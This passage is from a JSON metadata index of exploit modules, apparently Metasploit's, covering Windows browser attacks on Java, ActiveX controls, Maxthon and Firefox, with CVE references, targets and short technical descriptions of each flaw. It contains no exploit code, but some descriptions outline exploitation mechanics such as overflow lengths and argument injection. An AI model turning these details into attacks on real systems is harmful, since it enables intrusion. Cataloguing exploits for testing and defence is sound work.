"references": [
"CVE-2012-5896",
"OSVDB-80662",
"BID-52765",
"EDB-18674"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP/Vista SP0-SP3 (IE6/IE7)",
"Windows XP SP0-SP3 DEP bypass (IE8)",
"Windows 7/Vista ALSR/DEP bypass (IE8)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb",
"is_install_path": true,
"ref_name": "windows/browser/intrust_annotatex_add",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_basicservice_impl": {
"name": "Sun Java Web Start BasicServiceImpl Code Execution",
"full_name": "exploit/windows/browser/java_basicservice_impl",
"rank": 600,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"",
"references": [
"CVE-2010-3563",
"OSVDB-69043",
"URL-http://mk41ser.blogspot.com"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_basicservice_impl.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_basicservice_impl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_cmm": {
"name": "Java CMM Remote Code Execution",
"full_name": "exploit/windows/browser/java_cmm",
"rank": 300,
"disclosure_date": "2013-03-01",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.",
"references": [
"CVE-2013-1493",
"OSVDB-90737",
"BID-58238",
"URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493",
"URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html",
"URL-http://pastie.org/pastes/6581034"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_cmm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_cmm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_codebase_trust": {
"name": "Sun Java Applet2ClassLoader Remote Code Execution",
"full_name": "exploit/windows/browser/java_codebase_trust",
"rank": 600,
"disclosure_date": "2011-02-15",
"type": "exploit",
"author": [
"Frederic Hoguin",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.",
"references": [
"CVE-2010-4452",
"OSVDB-71193",
"ZDI-11-084",
"URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/",
"URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html"
],
"platform": "Java",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_codebase_trust.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_codebase_trust",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_docbase_bof": {
"name": "Sun Java Runtime New Plugin docbase Buffer Overflow",
"full_name": "exploit/windows/browser/java_docbase_bof",
"rank": 500,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.",
"references": [
"CVE-2010-3552",
"OSVDB-68873",
"BID-44023",
"URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html",
"ZDI-10-206",
"URL-http://code.google.com/p/skylined/issues/detail?id=23",
"URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal (msvcr71.dll ROP)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_docbase_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_docbase_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_mixer_sequencer": {
"name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
"full_name": "exploit/windows/browser/java_mixer_sequencer",
"rank": 500,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Peter Vreugdenhil",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation is done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer object is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.",
"references": [
"CVE-2010-0842",
"OSVDB-63493",
"BID-39077",
"ZDI-10-060",
"URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows / Java 6 <=u18"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_mixer_sequencer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_arginject_altjvm": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"full_name": "exploit/windows/browser/java_ws_arginject_altjvm",
"rank": 600,
"disclosure_date": "2010-04-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2010-0886",
"CVE-2010-1423",
"OSVDB-63648",
"BID-39346",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_arginject_altjvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_double_quote": {
"name": "Sun Java Web Start Double Quote Injection",
"full_name": "exploit/windows/browser/java_ws_double_quote",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Rh0 <rh0@z1p.biz>"
],
"description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.",
"references": [
"CVE-2012-1533",
"OSVDB-86348",
"BID-56046",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-http://pastebin.com/eUucVage"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/java_ws_double_quote.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_double_quote",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_ws_vmargs": {
"name": "Sun Java Web Start Plugin Command Line Argument Injection",
"full_name": "exploit/windows/browser/java_ws_vmargs",
"rank": 600,
"disclosure_date": "2012-02-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.",
"references": [
"CVE-2012-0500",
"OSVDB-79227",
"BID-52015",
"URL-https://seclists.org/fulldisclosure/2012/Feb/251",
"URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Java Runtime on Windows x86"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/java_ws_vmargs.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_ws_vmargs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/juniper_sslvpn_ive_setupdll": {
"name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/juniper_sslvpn_ive_setupdll",
"rank": 300,
"disclosure_date": "2006-04-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX control,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.",
"references": [
"CVE-2006-2086",
"OSVDB-25001",
"BID-17712",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English",
"Debugging"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb",
"is_install_path": true,
"ref_name": "windows/browser/juniper_sslvpn_ive_setupdll",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/kazaa_altnet_heap": {
"name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/kazaa_altnet_heap",
"rank": 300,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-5217",
"OSVDB-37785",
"URL-http://secunia.com/advisories/26970/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0SP1 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb",
"is_install_path": true,
"ref_name": "windows/browser/kazaa_altnet_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/keyhelp_launchtripane_exec": {
"name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",
"full_name": "exploit/windows/browser/keyhelp_launchtripane_exec",
"rank": 600,
"disclosure_date": "2012-06-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products of GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then uploading another MOF file, which enables the Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n Additionally, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3.",
"references": [
"CVE-2012-2516",
"OSVDB-83311",
"BID-55265",
"ZDI-12-169",
"URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/keyhelp_launchtripane_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/logitechvideocall_start": {
"name": "Logitech VideoCall ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/logitechvideocall_start",
"rank": 300,
"disclosure_date": "2007-05-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-2918",
"OSVDB-36820",
"BID-24254"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP2 English"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/logitechvideocall_start.rb",
"is_install_path": true,
"ref_name": "windows/browser/logitechvideocall_start",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/lpviewer_url": {
"name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/lpviewer_url",
"rank": 300,
"disclosure_date": "2008-10-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-4384",
"OSVDB-48946",
"US-CERT-VU-848873",
"BID-31604"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/lpviewer_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/lpviewer_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/macrovision_downloadandexecute": {
"name": "Macrovision InstallShield Update Service Buffer Overflow",
"full_name": "exploit/windows/browser/macrovision_downloadandexecute",
"rank": 300,
"disclosure_date": "2007-10-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service (Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5660",
"OSVDB-38347"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_downloadandexecute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/macrovision_unsafe": {
"name": "Macrovision InstallShield Update Service ActiveX Unsafe Method",
"full_name": "exploit/windows/browser/macrovision_unsafe",
"rank": 600,
"disclosure_date": "2007-10-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.",
"references": [
"CVE-2007-5660",
"OSVDB-38347",
"BID-26280"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/macrovision_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/macrovision_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/malwarebytes_update_exec": {
"name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution",
"full_name": "exploit/windows/browser/malwarebytes_update_exec",
"rank": 400,
"disclosure_date": "2014-12-16",
"type": "exploit",
"author": [
"Yonathan Klijnsma",
"Gabor Seljan",
"todb <todb@metasploit.com>"
],
"description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
"references": [
"CVE-2014-4936",
"OSVDB-116050",
"URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/malwarebytes_update_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/maxthon_history_xcs": {
"name": "Maxthon3 about:history XCS Trusted Zone Code Execution",
"full_name": "exploit/windows/browser/maxthon_history_xcs",
"rank": 600,
"disclosure_date": "2012-11-26",
"type": "exploit",
"author": [
"Roberto Suggi Liverani",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such a privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of Maxthon. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
"references": [
"OSVDB-88191",
"EDB-23225",
"URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Maxthon 3 (prior to 3.3) on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb",
"is_install_path": true,
"ref_name": "windows/browser/maxthon_history_xcs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafee_mcsubmgr_vsprintf": {
"name": "McAfee Subscription Manager Stack Buffer Overflow",
"full_name": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf",
"rank": 300,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.",
"references": [
"CVE-2006-3961",
"OSVDB-27698",
"BID-19265"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafee_mvt_exec": {
"name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
"full_name": "exploit/windows/browser/mcafee_mvt_exec",
"rank": 600,
"disclosure_date": "2012-04-30",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.",
"references": [
"CVE-2012-4598",
"OSVDB-81657",
"EDB-18805",
"URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafee_mvt_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mcafeevisualtrace_tracetarget": {
"name": "McAfee Visual Trace ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/mcafeevisualtrace_tracetarget",
"rank": 300,
"disclosure_date": "2007-07-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2006-6707",
"OSVDB-32399",
"URL-http://secunia.com/advisories/23463"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP2 English"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb",
"is_install_path": true,
"ref_name": "windows/browser/mcafeevisualtrace_tracetarget",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mirc_irc_url": {
"name": "mIRC IRC URL Buffer Overflow",
"full_name": "exploit/windows/browser/mirc_irc_url",
"rank": 300,
"disclosure_date": "2003-10-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.",
"references": [
"CVE-2003-1336",
"OSVDB-2665",
"BID-8819"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mirc_irc_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/mirc_irc_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_attribchildremoved": {
"name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free",
"full_name": "exploit/windows/browser/mozilla_attribchildremoved",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"regenrecht",
"Lincoln <lincoln@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.",
"references": [
"CVE-2011-3659",
"OSVDB-78736",
"ZDI-12-110",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP - Firefox 8 / 8.0.1",
"Windows XP - Firefox 9",
"Windows XP - Firefox 9.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_attribchildremoved",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_firefox_onreadystatechange": {
"name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free",
"full_name": "exploit/windows/browser/mozilla_firefox_onreadystatechange",
"rank": 300,
"disclosure_date": "2013-06-25",
"type": "exploit",
"author": [
"Nils",
"Unknown",
"w3bd3vil",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild in August 2013 to target Tor Browser users.",
"references": [
"CVE-2013-1690",
"OSVDB-94584",
"BID-60778",
"URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html",
"URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365",
"URL-http://krash.in/ffn0day.txt",
"URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 17 & Firefox 21 / Windows XP SP3"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_onreadystatechange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_firefox_xmlserializer": {
"name": "Firefox XMLSerializer Use After Free",
"full_name": "exploit/windows/browser/mozilla_firefox_xmlserializer",
"rank": 300,
"disclosure_date": "2013-01-08",
"type": "exploit",
"author": [
"regenrecht",
"juan vazquez <juan.vazquez@metasploit.com>"
],
